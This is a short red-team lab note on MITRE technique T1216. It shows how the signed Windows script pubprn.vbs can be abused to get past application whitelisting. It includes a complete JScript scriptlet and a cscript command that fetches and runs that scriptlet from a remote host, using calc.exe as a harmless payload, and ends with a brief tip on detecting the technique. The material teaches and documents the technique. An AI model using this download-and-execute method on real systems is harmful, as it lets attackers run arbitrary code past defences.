description |
---|
Signed Script Proxy Execution - bypass application whitelisting using pubprn.vbs |
Using pubprn.vbs, we will execute code to launch calc.exe. First of, the xml that will be executed by the script:
{% code title="http://192.168.2.71/tools/mitre/proxy-script/proxy.sct" %}
<?XML version="1.0"?>
<scriptlet>
<registration
description="Bandit"
progid="Bandit"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
>
</registration>
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</scriptlet>
{% endcode %}
{% code title="attacker@victim" %}
cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:http://192.168.2.71/tools/mitre/proxy-script/proxy.sct
{% endcode %}
Calc.exe gets spawned by cscript.exe which immediately closes leaving the calc.exe process orphan:
Monitoring commandlines can be useful in detecting the script being abused:
{% embed url="https://attack.mitre.org/wiki/Technique/T1216" %}